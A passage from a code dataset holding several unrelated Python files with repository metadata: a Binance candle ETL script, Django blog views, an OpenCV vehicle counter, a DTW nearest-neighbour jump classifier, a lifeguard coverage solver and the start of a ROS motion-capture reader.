        "INSERT INTO binance_transformed_data (symbol, open_time, close_time, open_price, close_price, low_price, high_price, volume, quote_asset_volume, number_of_trades, taker_buy_base_asset_volume, taker_buy_quote_asset_volume, unused) "
        "VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
    )
    # One parameter tuple per candle, in column order.
    rows = [
        (d.symbol, d.open_time, d.close_time, d.open_price, d.close_price,
         d.low_price, d.high_price, d.volume, d.quote_asset_volume,
         d.number_of_trades, d.taker_buy_base_asset_volume,
         d.taker_buy_quote_asset_volume, d.unused)
        for d in data
    ]
    cursor.executemany(insert_statement, rows)
    cnx.commit()
    cursor.close()
    cnx.close()
def transform(data: List['BinanceData'], interval: int) -> List['BinanceData']:
    """Aggregate consecutive candles into coarser ones.

    Combines every `interval` consecutive 1-unit candles into a single
    candle (e.g. five 1-minute candles into one 5-minute candle). The final
    chunk may be shorter when len(data) is not a multiple of `interval`.

    :raises ValueError: if interval is not a positive integer.
    """
    if interval <= 0:
        # Fix: the TODO'd bare ValueError now carries a message.
        raise ValueError("interval must be a positive integer")
    transformed_data = []
    for i in range(0, len(data), interval):
        # Slicing clamps at the end of the list, so no min() is needed.
        chunk = data[i:i + interval]
        first = chunk[0]
        last = chunk[-1]
        # Seed the extrema from the first candle; the loop below folds in
        # every candle of the chunk (including the first).
        low_price = first.low_price
        high_price = first.high_price
        volume = quote_asset_volume = number_of_trades = 0
        taker_buy_base_asset_volume = taker_buy_quote_asset_volume = 0
        for d in chunk:
            low_price = min(low_price, d.low_price)
            high_price = max(high_price, d.high_price)
            volume += d.volume
            quote_asset_volume += d.quote_asset_volume
            number_of_trades += d.number_of_trades
            taker_buy_base_asset_volume += d.taker_buy_base_asset_volume
            taker_buy_quote_asset_volume += d.taker_buy_quote_asset_volume
        transformed_data.append(BinanceData(
            symbol=first.symbol,
            open_time=first.open_time,
            close_time=last.close_time,
            open_price=first.open_price,
            close_price=last.close_price,
            low_price=low_price,
            high_price=high_price,
            volume=volume,
            quote_asset_volume=quote_asset_volume,
            number_of_trades=number_of_trades,
            taker_buy_base_asset_volume=taker_buy_base_asset_volume,
            taker_buy_quote_asset_volume=taker_buy_quote_asset_volume,
            unused=last.unused
        ))
    return transformed_data
def get_in_time_range(symbol, startTime: int, endTime: int, limit=500) -> List['BinanceData']:
    '''
    Get a list of BinanceData from the database within a specified time range.

    Pages through binance_source_data.binance_data in `limit`-sized chunks,
    ordered by open_time ascending, until no rows remain.

    :param symbol: trading pair symbol to filter on.
    :param startTime: The start of the time range (unix time), inclusive.
    :param endTime: The end of the time range (unix time), inclusive.
    :return: a list of BinanceData
    '''
    cnx = mysql.connector.connect(
        host=config.host,
        user=config.user,
        password=config.passwd,
        database="binance_source_data")
    cursor = cnx.cursor(dictionary=True)
    query = ("SELECT * FROM binance_data "
             "WHERE open_time >= %s AND open_time <= %s AND symbol = %s "
             "ORDER BY open_time ASC "
             "LIMIT %s OFFSET %s")
    data = []
    offset = 0
    while True:
        cursor.execute(query, (startTime, endTime, symbol, limit, offset))
        rows = cursor.fetchall()
        if not rows:
            break
        for row in rows:
            data.append(BinanceData(
                symbol=row['symbol'],
                open_time=row['open_time'],
                open_price=row['open_price'],
                high_price=row['high_price'],
                low_price=row['low_price'],
                close_price=row['close_price'],
                volume=row['volume'],
                close_time=row['close_time'],
                quote_asset_volume=row['quote_asset_volume'],
                number_of_trades=row['number_of_trades'],
                taker_buy_base_asset_volume=row['taker_buy_base_asset_volume'],
                taker_buy_quote_asset_volume=row['taker_buy_quote_asset_volume'],
                unused=row['unused']
            ))
        offset += limit
    cnx.close()
    return data
def transform_job(symbol, startTime, endTime, interval):
    """ETL pipeline for one symbol/time window: fetch source candles,
    aggregate them by `interval`, and load the result into the
    transformed-data table."""
    source_candles = get_in_time_range(symbol, startTime, endTime)
    load(transform(source_candles, interval))
def main():
    """Parse CLI arguments, validate the time window, and run the ETL job."""
    args = parse_args()
    symbol = args.symbol
    startTime = int(args.startTime)
    endTime = int(args.endTime)
    interval = int(args.interval)
    if startTime >= endTime:
        raise ValueError(f"startTime returns trades from that time and endTime returns trades starting from the endTime"
                         f"including all trades before that time. startTime must be smaller than endTime")
    transform_job(symbol=symbol, startTime=startTime, endTime=endTime, interval=interval)
def parse_args():
    """Command-line interface: --symbol, --startTime, --endTime, --interval."""
    parser = argparse.ArgumentParser()
    for flag, arg_type in (('--symbol', str),
                           ('--startTime', int),
                           ('--endTime', int),
                           ('--interval', int)):
        parser.add_argument(flag, type=arg_type)
    return parser.parse_args()
if __name__ == '__main__':
main() | Sherry-W071/Real-time-Cryptocurrency-Data-Aggregation-and-Processing-Pipeline | transform_load.py | transform_load.py | py | 9,045 | python | en | code | 0 | github-code | 36 |
28886388336 | # from urllib import request
from django.shortcuts import render, redirect
from .models import Post, Comment
from .forms import CommentForm, PostUpdateForm
# from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
# LoginRequiredMixin is simply the class based version for login_required decorator.
# because we cannot use decorators with classes, we are using mixins instead.
# UserPassesTestMixin mixin is for making sure that only the author can edit the posts
from django.contrib.auth.mixins import (LoginRequiredMixin,
UserPassesTestMixin)
from django.views.generic import (ListView,
# DetailView,
CreateView,
UpdateView,
DeleteView)
#! FBV for listing blog posts
def home(request):
    """Render the home page with every blog post."""
    return render(request, 'blog/home.html', {'posts': Post.objects.all()})
#! CBV for listing blog posts
class PostListView(ListView):
    """List all posts on the home page, newest first."""
    model = Post
    template_name = 'blog/home.html' # default would be <app>/<model>_<viewtype>.html, i.e. 'blog/post_list.html'
    context_object_name = 'posts' # default context name is "object_list"; 'posts' keeps home.html readable
    ordering = ['-date_posted']
#! CBV for individual blog posts
# class PostDetailView(LoginRequiredMixin, DetailView):
# model = Post
# form = CommentForm
# # actually, for this one let's create the defualt html template file django is looking for. And since this
# # is a detailview, django's gonna look for a template named 'blog/post_detail.html'.
# # not defining our context_object_name, we'll have to use 'object' for every post in our blog/post_detail.html template
# #? view count part
# def get_object(self):
# views = super().get_object()
# views.blog_view += 1
# views.save()
# print(CommentForm)
# print(Post.objects.get(id = views.pk) == views)
# # if request.method == 'POST':
# # print(CommentForm(request.POST))
# # if form.is_valid():
# # comment=form.save(commit=False)
# # comment.blog = views
# # comment.save()
# return views
#! FBV for individual blog posts
@login_required
def blog_detail(request, pk):
    """Display a single post with its comments and handle new-comment POSTs.

    Every request increments the post's view counter; a successful comment
    POST also bumps the comment counter and redirects back to this view.
    """
    post = Post.objects.get(id=pk)
    form = CommentForm()
    # Removed the unused PostUpdateForm instance and leftover debug prints.
    comments = Comment.objects.filter(post=post.id)
    post.blog_view += 1
    post.save()
    if request.method == 'POST':
        form = CommentForm(request.POST)
        if form.is_valid():
            comment = form.save(commit=False)
            comment.post = post
            post.blog_comment += 1
            comment.user = request.user
            # NOTE(review): presumably offsets the +1 above plus the +1 from
            # the GET triggered by the redirect, so comment POSTs don't count
            # as views -- confirm this is the intent.
            post.blog_view -= 2
            post.save()
            comment.save()
            return redirect("post-detail", pk)
    return render(request, 'blog/post_detail.html', {'post': post, 'form': form, 'comments': comments})
#! CBV for creating blog posts
class PostCreateView(LoginRequiredMixin, CreateView): # make sure you add your mixins to the left. They should be inherited first, in other words
model = Post
fields = ('title', 'content', 'post_image')
success_url = '/'
# we are getting a "NOT NULL constraint failed: blog_post.author_id" after posting a blog post which
# means that the post needs an author and django by default cannot know who the author is. Therefore,
# we'll need to override the form_valid method and set the author before saving it
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
#! CBV for updating blog posts
class PostUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
    """Edit an existing post; restricted to logged-in users who wrote it."""
    model = Post
    fields = ('title', 'content', 'post_image')

    def form_valid(self, form):
        # Stamp the current user as the author before saving.
        form.instance.author = self.request.user
        return super().form_valid(form)

    def test_func(self):
        # UserPassesTestMixin hook: only the post's author may update it.
        return self.request.user == self.get_object().author
#! CBV for deleting blog posts
class PostDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
    """Delete a post; restricted to logged-in users who wrote it."""
    model = Post
    success_url = '/'

    def test_func(self):
        # UserPassesTestMixin hook: only the post's author may delete it.
        return self.request.user == self.get_object().author
def like_post(request, id):
    """Toggle the current user's like on a post and re-render the like area."""
    if request.method == "POST":
        instance = Post.objects.get(id=id)
        # Remove the like if it exists, otherwise add it.
        if instance.likes.filter(id=request.user.id).exists():
            instance.likes.remove(request.user)
        else:
            instance.likes.add(request.user)
        instance.save()
        return render(request, 'blog/likes_area.html', context={'post': instance})
# def post_comment(request, id):
# model = Comment.objects.get(id=id)
# comment = CommentForm(instance=model)
# if request.method == "POST":
# comment = CommentForm(request.POST, instance=model)
# # instance = CommentForm(request, id=id)
# if comment.is_valid():
# comment.save()
# return render( request, 'blog/post_comment.html', context={'comment':comment})
# class CommentView(CreateView):
# model = Comment
# template_name = 'blog/post_comment.html'
# fields = ('post', 'body','date_added')
def about(request):
    """Render the static about page."""
    return render(request, 'blog/about.html')
1693307394 | import numpy as np
import math
import cv2
# Tracker state: object_id -> last known centroid, and the per-frame
# [x, y, w, h, id] boxes.
center_points = {}
objects_bbs_ids = []
id_count = 0
vechical_count = 0
count = 0
person_id = 0
# Video source and background-subtraction setup.
camera = cv2.VideoCapture("video.mp4")
object_detector = cv2.createBackgroundSubtractorMOG2(history = None, varThreshold = None)
# Morphology kernels: opening (noise removal), closing (hole filling), erosion.
kernelOp = np.ones((3,3), np.uint8)
kernelC1 = np.ones((11,11), np.uint8)
fgbg = cv2.createBackgroundSubtractorMOG2(detectShadows = True)
kernel_e = np.ones((5,5), np.uint8)
# Main loop: detect moving blobs in the ROI, track them by nearest centroid,
# and count vehicles as they cross the y = 235..255 band.
while True:
    ret, frame = camera.read()
    if not ret: break
    frame = cv2.resize(frame, None, fx = 0.5, fy = 0.5)
    width, height, _ = frame.shape
    roi = frame[50: 540, 200:960]
    # Foreground mask -> binarize -> open/close/erode to clean up blobs.
    fgmask = fgbg.apply(roi)
    ret, imBin = cv2.threshold(fgmask, 200, 255, cv2.THRESH_BINARY)
    mask1 = cv2.morphologyEx(imBin, cv2.MORPH_OPEN, kernelOp)
    mask2 = cv2.morphologyEx(mask1, cv2.MORPH_CLOSE, kernelC1)
    e_img = cv2.erode(mask2, kernel_e)
    contours, _ = cv2.findContours(e_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    # Keep only sufficiently large contours as candidate vehicles.
    detections = []
    for cnt in contours:
        area = cv2.contourArea(cnt)
        if area > 1000:
            x, y, w, h = cv2.boundingRect(cnt)
            cv2.rectangle(roi, (x, y), (x + w, y + h), (0, 255, 0), 2)
            detections.append([x, y, w, h])
    # Match each detection to an existing tracked object by centroid distance.
    for rect in detections:
        x, y, w, h = rect
        cx = (x + x + w) // 2
        cy = (y + y + h) // 2
        same_object_detected = False
        for id, pt in center_points.items():
            distance = math.hypot(cx - pt[0], cy - pt[1])
            if distance < 70:
                center_points[id] = (cx, cy)
                objects_bbs_ids.append([x, y, w, h, id])
                same_object_detected = True
                # NOTE(review): `count` is reset to 0 each frame below and
                # vechical_count is incremented both here (crossing band) and
                # for every new object -- the counting logic looks fragile;
                # confirm intended semantics before refactoring.
                if (y >= 235 and y <= 255) and count != 1:
                    count += 1
                    vechical_count += count
        if same_object_detected is False and count != 1:
            # Unmatched detection: register a new tracked object.
            center_points[id_count] = (cx, cy)
            objects_bbs_ids.append([x, y, w, h, id_count])
            count += 1
            vechical_count += 1
            id_count += 1
    # Drop centroids of objects not seen this frame.
    new_center_point = {}
    for obj_bb_id in objects_bbs_ids:
        _, _, _, _, object_id = obj_bb_id
        center = center_points[object_id]
        new_center_point[object_id] = center
    center_points = new_center_point.copy()
    box_ids = objects_bbs_ids
    objects_bbs_ids = []
    count = 0
    # Draw tracked boxes with their ids, plus the running total.
    for box_id in box_ids:
        x, y, w, h, id = box_id
        cv2.rectangle(roi, (x, y), (x + w, y + h), (0, 255, 0), 2)
        cv2.putText(roi, str(id),(x + 15, y + 15), cv2.FONT_HERSHEY_PLAIN, 2, (0, 0, 255), 4)
    cv2.rectangle(roi, (10, 10), (75, 75), (0, 255, 0), cv2.FILLED)
    cv2.putText(roi, str(vechical_count), (20, 50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 4)
    cv2.imshow("counter", roi)
    if cv2.waitKey(1) == ord('q'): break
camera.release()
cv2.destroyAllWindows()
| Computer4062/Python-Projects | Road Tracker/counter.py | counter.py | py | 2,880 | python | en | code | 0 | github-code | 36 |
8293997114 | # -*- coding: utf-8 -*-
"""
Created on Fri Sep 17 13:44:46 2021
@author: bfeng1
"""
import json
import sys
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
import numpy as np
from scipy.signal import savgol_filter
from sklearn.utils import resample
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
from scipy.stats import mode
from scipy.spatial.distance import squareform
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
#%%
class jump:
    """One recorded jump video: a CSV of per-frame joint angles plus the
    frame ranges ('jump cycles') that delimit each individual jump.

    Class attributes:
        n: fixed length (rows) each jump cycle is resampled to.
        r: half-width (frames) of the search window used by finetune().
    """
    n = 135
    r = 5
    def __init__(self, name, jump_cycle):
        # name: CSV basename under csv_files/ (without the .csv extension).
        # jump_cycle: list of [start_frame, end_frame] pairs, one per cycle.
        self.name = name
        self.jump_cycle = jump_cycle
    def csv2df(self):
        """Load this jump's CSV, derive the 'left angle ratio' feature, drop
        outlier rows (ratio outside [0.75, 2.25]) and add a Savitzky-Golay
        smoothed copy of the ratio ('smoothed')."""
        csv_file = 'csv_files/'+self.name + '.csv'
        df = pd.read_csv(csv_file)
        # cleaning the dataset(drop the rows with ratio is higher than 2.25)
        df['left angle ratio'] = df['Angle1']/df['Angle3']
        df.drop(df[df['left angle ratio']>2.25].index, inplace = True)
        df.drop(df[df['left angle ratio']<0.75].index, inplace = True)
        df['smoothed'] = savgol_filter(df['left angle ratio'], 25, 2)
        return df
    def finetune(self):
        """Snap each jump-cycle boundary to the local maximum of
        'left angle ratio' within +/- r frames; return the adjusted cycles.

        NOTE(review): csv2df drops outlier rows, leaving gaps in the index, so
        the positional slice df[start:end] may not line up with frame numbers
        — confirm intent.
        """
        df = jump.csv2df(self)
        jump_cycle = self.jump_cycle
        new_results = []
        for domain in jump_cycle:
            current_list = []
            for inx in domain:
                start = inx - jump.r
                end = inx + jump.r
                temp = df[start:end]
                max_val = temp['left angle ratio'].max()
                ind = temp[temp['left angle ratio'] == max_val].index.values.astype(int)
                try:
                    ind = ind[0]
                except:
                    ind = 0
                current_list.append(ind)
            new_results.append(current_list)
        check = (jump_cycle == new_results)
        # NOTE(review): the two messages look swapped — "has been finetuned"
        # prints only when nothing changed; confirm the intended wording.
        if check is False:
            print('old cycle {}: {}'.format(self.name, jump_cycle))
            print('new cycle {}: {}'.format(self.name, new_results))
        elif check is True:
            print('The jump cycle has been finetuned')
        return new_results
    def resample_df(self):
        """Slice the cleaned DataFrame into one piece per jump cycle and
        resample each piece (without replacement, fixed seed) to exactly n
        rows. Returns a list of DataFrames with fresh 0..n-1 indices."""
        df_list = []
        jump_cycle = self.jump_cycle
        df = jump.csv2df(self)
        for i in range(len(jump_cycle)):
            temp = df[jump_cycle[i][0]:jump_cycle[i][1]]
            resample_data = resample(temp, n_samples = jump.n, replace = False, random_state = 0).sort_index()
            # resample_data: resampled dataframe
            resample_data = resample_data.reset_index()
            df_list.append(resample_data)
        # create plots with resampled data
        return df_list
    def vis(self):
        """Plot every resampled cycle (raw ratio as scatter, smoothed as line)
        in a two-column grid of subplots."""
        df_list = jump.resample_df(self)
        a = (len(df_list)+1)//2
        b = 2
        plt.figure(figsize = (14,22))
        for i in range(len(df_list)):
            plt.subplot(a,b,i+1)
            plt.title('subplots {}{}{} : cycle {}'.format(a,b,i+1,i+1))
            plt.xlabel('frame number')
            plt.ylabel('Left angle ratio')
            sns.scatterplot(data = df_list[i], x = df_list[i].index, y = 'left angle ratio')
            sns.lineplot(data = df_list[i], x = df_list[i].index, y = 'smoothed')
        print('the process is done for the jump {}'.format(self.name))
# #%%
# # create lists to store the names of csv files
# # create jump cycle(manually select range, then autocorrect by algorithm)
# good_jump_cycle = [[154,309],[398,539],[651,786],[825,980],[1018,1158],[1188,1337],[1374,1524],[1555,1698],[1737,1881],[1895,2054]]
# # cycle1: [010262,010456], [010469, 010638], [010655,010821],[010829,010998],[010998,011163],[011168,011331], [011331, 011497],[011497,011659],[011670,011849],[011849,012015]
# inner_jump_cycle=[ [397,562],[562,742],[742,902],[902,1060],[1060,1232],[1232,1398],[1398,1583],[1583,1760]]
# # cycle1: [001550,001700], [001716, 001902], [001930,002095],[002128,002300],[002330,002520],[002540,002709], [002729, 002900],[002916,003078],[003085,03249]
# outer_jump_cycle = [[379,552],[579,767],[767,973],[991,1171],[1171,1351],[1364,1527],[1543,1697]]
#%%
class KnnDtw(object):
    """K-nearest neighbor classifier using dynamic time warping
    as the distance measure between pairs of time series arrays
    Arguments
    ---------
    n_neighbors : int, optional (default = 5)
        Number of neighbors to use by default for KNN
    max_warping_window : int, optional (default = infinity)
        Maximum warping window allowed by the DTW dynamic
        programming function
    subsample_step : int, optional (default = 1)
        Step size for the timeseries array. By setting subsample_step = 2,
        the timeseries length will be reduced by 50% because every second
        item is skipped. Implemented by x[:, ::subsample_step]
    """
    def __init__(self, n_neighbors=5, max_warping_window=10000, subsample_step=1):
        self.n_neighbors = n_neighbors
        self.max_warping_window = max_warping_window
        self.subsample_step = subsample_step
    def fit(self, x, l):
        """Fit the model using x as training data and l as class labels
        Arguments
        ---------
        x : array of shape [n_samples, n_timepoints]
            Training data set for input into KNN classifer
        l : array of shape [n_samples]
            Training labels for input into KNN classifier
        """
        # Lazy learner: just memorize the training set; all work happens in predict().
        self.x = x
        self.l = l
    def _dtw_distance(self, ts_a, ts_b, d = lambda x,y: abs(x-y)):
        """Returns the DTW similarity distance between two 2-D
        timeseries numpy arrays.
        Arguments
        ---------
        ts_a, ts_b : array of shape [n_samples, n_timepoints]
            Two arrays containing n_samples of timeseries data
            whose DTW distance between each sample of A and B
            will be compared
        d : DistanceMetric object (default = abs(x-y))
            the distance measure used for A_i - B_j in the
            DTW dynamic programming function
        Returns
        -------
        DTW distance between A and B
        """
        # Create cost matrix via broadcasting with large int
        ts_a, ts_b = np.array(ts_a), np.array(ts_b)
        M, N = len(ts_a), len(ts_b)
        cost = sys.maxsize * np.ones((M, N))
        # Initialize the first row and column
        cost[0, 0] = d(ts_a[0], ts_b[0])
        for i in range(1, M):
            cost[i, 0] = cost[i-1, 0] + d(ts_a[i], ts_b[0])
        for j in range(1, N):
            cost[0, j] = cost[0, j-1] + d(ts_a[0], ts_b[j])
        # Populate rest of cost matrix within window
        # (cells outside the warping window keep the sys.maxsize sentinel).
        for i in range(1, M):
            for j in range(max(1, i - self.max_warping_window),
                           min(N, i + self.max_warping_window)):
                choices = cost[i - 1, j - 1], cost[i, j-1], cost[i-1, j]
                cost[i, j] = min(choices) + d(ts_a[i], ts_b[j])
        # Return DTW distance given window
        return cost[-1, -1]
    def _dist_matrix(self, x, y):
        """Computes the M x N distance matrix between the training
        dataset and testing dataset (y) using the DTW distance measure
        Arguments
        ---------
        x : array of shape [n_samples, n_timepoints]
        y : array of shape [n_samples, n_timepoints]
        Returns
        -------
        Distance matrix between each item of x and y with
        shape [training_n_samples, testing_n_samples]
        """
        # Compute the distance matrix
        dm_count = 0
        # Compute condensed distance matrix (upper triangle) of pairwise dtw distances
        # when x and y are the same array
        if(np.array_equal(x, y)):
            x_s = np.shape(x)
            dm = np.zeros((x_s[0] * (x_s[0] - 1)) // 2, dtype=np.double)
            for i in range(0, x_s[0] - 1):
                for j in range(i + 1, x_s[0]):
                    dm[dm_count] = self._dtw_distance(x[i, ::self.subsample_step],
                                                      y[j, ::self.subsample_step])
                    dm_count += 1
            # Convert to squareform
            dm = squareform(dm)
            return dm
        # Compute full distance matrix of dtw distnces between x and y
        else:
            x_s = np.shape(x)
            y_s = np.shape(y)
            dm = np.zeros((x_s[0], y_s[0]))
            for i in range(0, x_s[0]):
                for j in range(0, y_s[0]):
                    dm[i, j] = self._dtw_distance(x[i, ::self.subsample_step],
                                                  y[j, ::self.subsample_step])
                    # Update progress bar
                    dm_count += 1
            return dm
    def predict(self, x):
        """Predict the class labels or probability estimates for
        the provided data
        Arguments
        ---------
        x : array of shape [n_samples, n_timepoints]
            Array containing the testing data set to be classified
        Returns
        -------
        2 arrays representing:
            (1) the predicted class labels
            (2) the knn label count probability
        """
        dm = self._dist_matrix(x, self.x)
        # Identify the k nearest neighbors
        knn_idx = dm.argsort()[:, :self.n_neighbors]
        # Identify k nearest labels
        knn_labels = self.l[knn_idx]
        # Model Label
        # Majority vote among the k nearest training series.
        # NOTE(review): scipy >= 1.11 changed scipy.stats.mode defaults
        # (axis/keepdims handling) — verify against the pinned scipy version.
        mode_data = mode(knn_labels, axis=1)
        mode_label = mode_data[0]
        mode_proba = mode_data[1]/self.n_neighbors
        return mode_label.ravel(), mode_proba.ravel()
#%%
# CSV basenames of the recorded jumps, grouped by jump class.
good = ['good1', 'good2','good4','good6']
inner = ['inner1', 'inner2', 'inner3']
outer= ['outer1', 'outer2']
# Each line of list_info.txt holds the (JSON-encoded) jump-cycle frame ranges
# for the file at the same position in all_csv below.
with open('list_info.txt','r') as file:
    input_lines = [line.strip() for line in file]
all_csv = good+inner+outer
# info pairs every csv name with its raw jump-cycle string (json.loads later).
info = {}
info['name'] = all_csv
info['cycle'] = input_lines
#%%
# structure dataset for algorithm training:
# resample every jump cycle of every recording to a fixed length and
# collect the per-cycle DataFrames per class.
good_dataset = []
inner_dataset = []
outer_dataset = []
n = 135
for i in range(len(all_csv)):
    temp = jump(info['name'][i], json.loads(info['cycle'][i]))
    # temp.finetune()
    # temp.vis(n)
    # Files are ordered good -> inner -> outer, so the index decides the class.
    if i < len(good):
        good_dataset += temp.resample_df()
    elif i < len(good+inner):
        inner_dataset += temp.resample_df()
    else:
        outer_dataset += temp.resample_df()
total_x = good_dataset+inner_dataset+outer_dataset
# Tag every cycle DataFrame with a unique series_id, then stack them into one frame.
for i in range(len(total_x)):
    total_x[i]['series_id'] = i
X = pd.concat(total_x)
#%%
# compare time series signal for good jump and bad (inner+outer) jump
# load the label file (one row per series_id with its class in column 'jump')
y = pd.read_csv('csv_files/lable.csv')
label_encoder = LabelEncoder()
encoded_labels = label_encoder.fit_transform(y.jump)
y['label'] = encoded_labels
#%%
# create feature column (skip the first two bookkeeping columns)
feature_columns = X.columns.tolist()[2:]
# construct sequence: one (features DataFrame, encoded label) pair per cycle
sequences = []
for series_id, group in X.groupby('series_id'):
    sequence_features = group[feature_columns]
    label = y[y.series_id == series_id].iloc[0].label
    sequences.append((sequence_features, label))
def create_data(sequences, test_size = 0.2):
    """Split (features, label) sequences into train/test arrays for KnnDtw.

    Args:
        sequences: list of (DataFrame, label) pairs; each DataFrame holds one
            resampled jump cycle with a 'left angle ratio' column of 135 rows.
        test_size: fraction of sequences held out for testing.

    Returns:
        (train_X, test_X, train_y, test_y) where the X arrays have shape
        (n_sequences, 135) and the y arrays are 1-D label arrays.
    """
    # BUGFIX: test_size was previously ignored (0.2 was hard-coded below).
    train_sequences, test_sequences = train_test_split(sequences, test_size=test_size)
    def _to_arrays(seqs):
        # Flatten each sequence's ratio series into one fixed-length row.
        X_arr = np.empty(shape=(len(seqs), 135), dtype='object')
        y_list = []
        for i, (features, label) in enumerate(seqs):
            X_arr[i][:] = features['left angle ratio'].to_list()
            y_list.append(label)
        return X_arr, np.array(y_list)
    train_X, train_y = _to_arrays(train_sequences)
    test_X, test_y = _to_arrays(test_sequences)
    return train_X, test_X, train_y, test_y
#%%
# Evaluate the 1-NN DTW classifier over `iten` random train/test splits and
# average the accuracy and error rates.
iten = 20
score = 0
score_list = []
false_negative_rate = []
false_positive_rate = []
for i in range(iten):
    m = KnnDtw(n_neighbors=1, max_warping_window=15)
    train_X, test_X, train_y, test_y = create_data(sequences)
    m.fit(train_X, train_y)
    label, proba = m.predict(test_X)
    temp_score = accuracy_score(label,test_y)
    # Per-split confusion-matrix rates (binary labels assumed).
    tn, fp, fn, tp = confusion_matrix(test_y, label).ravel()
    false_positive_rate.append(fp/(fp+tn))
    false_negative_rate.append(fn/(fn + tp))
    score_list.append(temp_score)
    score += temp_score
print('the accuracy of the classifier: {}%'.format(score/iten*100))
print('false positive rate: {}'.format(np.mean(false_positive_rate)))
print('false negative rate: {}'.format(np.mean(false_negative_rate)))
| bfeng1/Jump-Classification-Project | aim2.py | aim2.py | py | 12,898 | python | en | code | 0 | github-code | 36 |
def get_data(inp_file_num):
    """Read ``<inp_file_num>.in`` and return its parsed contents.

    File format: the first line is the number of shifts; each following
    non-empty line holds whitespace-separated integers (a shift interval).

    Returns:
        tuple: (intervals, num_of_shifts, max_value + 1) where ``intervals``
        is a list of int lists and the last element is one past the largest
        integer seen (an exclusive upper bound for time units).
    """
    # ``with`` closes the handle even on parse errors (was leaked before);
    # bare split() also tolerates blank lines and repeated spaces, which used
    # to raise ValueError via int("").
    with open(f"{inp_file_num}.in", "r") as f:
        num_of_shifts = int(f.readline().strip())
        lines = [
            parsed
            for parsed in (list(map(int, raw.split())) for raw in f)
            if parsed
        ]
    max_num = max(max(interval) for interval in lines)
    return lines, num_of_shifts, max_num + 1
def pool_coverage(inp_file_num):
    """
    this function is used to calculate the maximum time units that can be covered after firing one life guard.
    """
    interval_list, total_shifts, max_num = get_data(inp_file_num)
    total_coverage = 0
    max_coverage = 0
    tu_diff = 0
    # time_unit[t]   : number of guards covering time unit t
    # un_frequency[t]: running count (up to t) of units covered by exactly one guard
    time_unit = calc_time_occurance(interval_list, total_shifts, max_num)
    un_frequency = calc_unique_number_frequency(time_unit, max_num)
    # print(time_unit,un_frequency)
    # Total number of time units covered by at least one guard.
    for i in range(max_num):
        if time_unit[i]:
            total_coverage = total_coverage + 1
    for shift in range(total_shifts):
        l = interval_list[shift][0]
        r = interval_list[shift][1]
        # tu_diff = units only this guard covers (prefix-count difference over
        # the covered range (l, r]); firing the guard loses exactly those units.
        if l != 0:
            tu_diff = un_frequency[r] - un_frequency[l]
        else:
            tu_diff = un_frequency[r]
        # Keep the best coverage achievable after removing one guard.
        if total_coverage - tu_diff >= max_coverage:
            max_coverage = total_coverage - tu_diff
    print("Maximum pool time coverage after firing one life guard is", max_coverage)
    write_output(inp_file_num, max_coverage)
def calc_time_occurance(interval_list, total_shifts, max_num):
    """Count, for every time unit, how many shifts cover it.

    A shift ``[start, end]`` covers the units ``start+1 .. end`` inclusive.
    Only the first ``total_shifts`` entries of ``interval_list`` are used.

    Returns:
        list[int]: length ``max_num``; index t holds the number of shifts
        covering time unit t.
    """
    coverage = [0] * max_num
    for interval in interval_list[:total_shifts]:
        start, end = interval[0], interval[1]
        for unit in range(start + 1, end + 1):
            coverage[unit] += 1
    return coverage
def calc_unique_number_frequency(time_unit, max_num):
    """Prefix counts of time units covered by exactly one shift.

    Result[i] is the number of indices j <= i with ``time_unit[j] == 1``,
    i.e. how many "uniquely covered" time units occur up to position i.

    Args:
        time_unit: per-unit coverage counts (as built by calc_time_occurance).
        max_num: how many leading entries of ``time_unit`` to scan.

    Returns:
        list[int]: running count of length ``max_num`` (empty when max_num
        is 0 — the previous version raised IndexError in that case).
    """
    from itertools import accumulate  # local import keeps this fix self-contained
    # The running sum of the indicator (count == 1) is exactly the original
    # element-by-element recurrence, expressed with itertools.accumulate.
    return list(accumulate(1 if time_unit[i] == 1 else 0 for i in range(max_num)))
def write_output(op_file_num, cov):
    """Write ``cov`` to ``<op_file_num>.out``, overwriting previous content.

    Args:
        op_file_num: basename of the output file (typically the input number).
        cov: value to persist; serialized with ``str()``.
    """
    # ``with`` flushes and closes the handle even if the write raises
    # (the previous manual open/close leaked on error).
    with open(f"{op_file_num}.out", "w") as f:
        f.write(str(cov))
| apoorvamalhotra/MysteriousSafeguards | dsAssignment/assignment.py | assignment.py | py | 2,590 | python | en | code | 0 | github-code | 36 |
7305279610 | #!/usr/bin/env python
import rospy
import serial
import time
import sys
import math
from FOF_API.MOCAP.getrigidbody import NatNetClient
from geometry_msgs.msg import Pose
# Module-level store shared with the NatNet callback thread:
# rigid-body id -> [position, rotation] from the most recent frame.
body = {}
class mocap_reader:
    """Bridges an OptiTrack/NatNet motion-capture stream into a ROS topic.

    Registers callbacks on a NatNetClient and republishes rigid-body poses on
    ``/mocap_data`` as geometry_msgs/Pose messages.
    """
    def __init__(self,clientAddress,serverAddress):
        """Initialize the ROS node and the /mocap_data publisher.

        clientAddress/serverAddress: IPs of this machine and the Motive server.
        """
        rospy.init_node('mocap_reader', anonymous=True, disable_signals=True)
        self.clientAddress = clientAddress
        self.serverAddress = serverAddress
        self.pub = rospy.Publisher('/mocap_data', Pose, queue_size=1)
    def receive_new_frame(self,data_dict):
        """Per-frame NatNet callback; optionally dumps the frame's metadata.

        NOTE(review): order_list is unused, and the dump assumes the dict
        values are strings (string concatenation) — confirm before enabling
        dump_args.
        """
        order_list=[ "frameNumber", "markerSetCount", "unlabeledMarkersCount", "rigidBodyCount", "skeletonCount",
                     "labeledMarkerCount", "timecode", "timecodeSub", "timestamp", "isRecording", "trackedModelsChanged" ]
        dump_args = False
        if dump_args == True:
            out_string = " "
            for key in data_dict:
                out_string += key + "="
                if key in data_dict :
                    out_string += data_dict[key] + " "
                out_string+="/"
            # print(out_string)
    # This is a callback function that gets connected to the NatNet client. It is called once per rigid body per frame
    def receive_rigid_body_frame( self,new_id, position, rotation):
        # pass
